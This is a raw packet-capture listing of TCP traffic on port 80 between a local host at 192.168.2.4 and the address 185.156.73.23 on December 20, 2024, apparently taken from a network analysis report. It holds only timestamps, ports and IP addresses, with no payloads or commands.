                                                                              Dec 20, 2024 16:28:20.741981030 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.742038012 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.742110014 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.742163897 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.742799997 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.742882013 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.743081093 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.743191957 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.743684053 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.743756056 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.743961096 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.744014978 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.744441032 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.744497061 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.744509935 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.744554043 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.745249987 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.745409966 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.745467901 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.746284962 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.746342897 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.769943953 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.770173073 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.770210028 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.770252943 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.770288944 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.770323038 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.770359993 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.770385981 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.770420074 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.771267891 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.771740913 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.771791935 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.771908998 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.771920919 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.771951914 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.772681952 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.772728920 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.772861958 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.772901058 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.773575068 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.773650885 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.773679972 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.773716927 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.774271965 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.774316072 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.774363041 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.774400949 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.775289059 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.775405884 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.775758982 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.775800943 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.775918961 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.775930882 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.775958061 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.775975943 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.776747942 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.776791096 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.776889086 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.776928902 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.777534008 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.777874947 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.777946949 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.778286934 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.778326035 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.778393030 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.778426886 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.779114008 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.779150009 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.779225111 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.779257059 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.779870987 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.781308889 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.850892067 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.850958109 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.851041079 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.851183891 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.851263046 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.851306915 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.851644993 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.851727009 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.852097034 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.852135897 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.852296114 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.852376938 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.852997065 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.853064060 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.853285074 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.853415012 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.853661060 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.853703022 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.854068995 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.854110003 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.854490995 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.854564905 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.854842901 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.854893923 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.855271101 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.855451107 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.855505943 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.856076956 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.856132984 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.856261969 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.856307030 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.856905937 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.856950998 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.857039928 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.857081890 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.857768059 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.857820034 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.858032942 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.858086109 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.858525991 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.858611107 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.858804941 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.858886957 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.859330893 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.859380960 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.859442949 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.859715939 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.860151052 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.860203981 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.860626936 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.860682011 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.860925913 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.860974073 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.861232042 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.861423969 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.861758947 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.861799955 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.862251043 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.862308025 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.862570047 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.862607002 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.862682104 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.862724066 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.863481045 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.863523960 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.863567114 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.863612890 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.864242077 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.864293098 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.864496946 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.864541054 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.864933014 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.864979029 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.865005970 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.865045071 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.865788937 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.865873098 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.865900040 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.865912914 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.866530895 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.866604090 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.866643906 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.866683006 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.867407084 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.867450953 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.867646933 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.867691040 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.868134975 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.868175983 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.868484020 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.868524075 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.868915081 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.869024992 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.869052887 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.869091034 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.869782925 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.869831085 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.870609999 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.870624065 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.870661974 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.870738983 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.870780945 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.871362925 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.871632099 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.871722937 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.928349972 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.928493023 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.928556919 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.928556919 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.928801060 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.928834915 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.928857088 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.928881884 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.930778027 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.930839062 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.930882931 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.930916071 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.930938005 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.930967093 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.931207895 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.931267023 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.931356907 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.931390047 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.931411028 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.931435108 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.931932926 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.931998968 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.932053089 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.932105064 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.932988882 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.933054924 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.933154106 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.933216095 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.933470011 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.933528900 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.933597088 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.933653116 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.934346914 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.934403896 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.934456110 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.934505939 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.935148954 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.935206890 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.935262918 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.935327053 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.935997009 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.936115980 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.936171055 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.936758995 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.936820030 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.936876059 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.936924934 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.937592983 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.937645912 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.937925100 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.937988997 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.938297987 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.938450098 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.962229967 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.962373972 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.962538958 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.962551117 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.962594986 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.962670088 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.962714911 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.963336945 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.963383913 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.963545084 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.963588953 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.964184046 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.964230061 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.964304924 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.964348078 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.964999914 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.965045929 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.965209961 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.965256929 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.965804100 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.965816975 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.965852022 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.965864897 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.966641903 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.966687918 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.966696978 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.966734886 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.967469931 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.967511892 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.967750072 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.968170881 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.968261003 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.968338966 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.968439102 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.968969107 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.969017029 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.969039917 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.969078064 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.969708920 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.969755888 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.970035076 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.970073938 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.970702887 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.970753908 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.970828056 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.971364975 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.971375942 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.971415043 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.971575022 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.971612930 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.972136974 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.972213030 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.043013096 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.043137074 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.043366909 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.043375969 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.043412924 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.043432951 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.043559074 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.043591976 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.044219971 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.044486046 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.044658899 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.044709921 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.044871092 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.044882059 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.045001984 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.045619011 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.045938969 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.045984030 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.046310902 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.046371937 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.046596050 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.046637058 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.047498941 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.047992945 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.048039913 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.048345089 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.048357964 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.048388958 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.048419952 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.049151897 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.049243927 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.049288034 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.049628973 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.049670935 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.049921989 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.049962044 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.050338030 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.050385952 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.050534964 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.050574064 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.051235914 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.051362038 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.051405907 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.051981926 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.052026033 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.052586079 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.052628994 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:21.052766085 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.052778006 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:21.052819014 CET4973080192.168.2.4185.156.73.23
